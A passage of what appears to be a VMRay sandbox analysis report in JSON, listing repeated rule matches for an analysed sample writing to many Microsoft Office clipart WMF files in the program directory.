"built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SL01394_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\sl01394_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_42590", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\sl01394_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SL01395_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\sl01395_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_42597", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\sl01395_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SL01565_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\sl01565_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_42604", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\sl01565_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00017_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00017_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_42613", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\so00017_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00018_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00018_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_42620", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\so00018_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00152_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00152_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_42627", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\so00152_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00157_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00157_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_42636", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\so00157_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00159_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00159_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_42645", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\so00159_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00166_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00166_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_42652", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\so00166_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00168_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00168_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_42659", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\so00168_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00170_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00170_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_42666", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\so00170_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00177_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00177_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_42673", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\so00177_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00183_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00183_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_42684", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\so00183_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00190_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00190_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_42691", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\so00190_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00191_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00191_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_42700", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\so00191_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00192_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00192_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_42707", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\so00192_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00194_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00194_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_42714", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\so00194_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00197_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00197_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_42721", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\so00197_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00199_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00199_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_42728", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\so00199_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00200_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00200_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_42735", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\so00200_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00208_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00208_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_42742", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\so00208_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00212_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00212_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_42749", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\so00212_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00221_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00221_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_42758", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\so00221_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00222_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00222_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_42765", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\so00222_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00223_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00223_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_42772", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\so00223_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00257_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00257_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_42779", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\so00257_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00289_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00289_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_42788", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\so00289_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00299_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00299_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_42801", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\so00299_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00305_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00305_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_42816", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\so00305_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00333_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00333_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_42825", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\so00333_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00345_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00345_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_42838", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\so00345_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00350_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00350_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_42849", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\so00350_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00352_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00352_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", 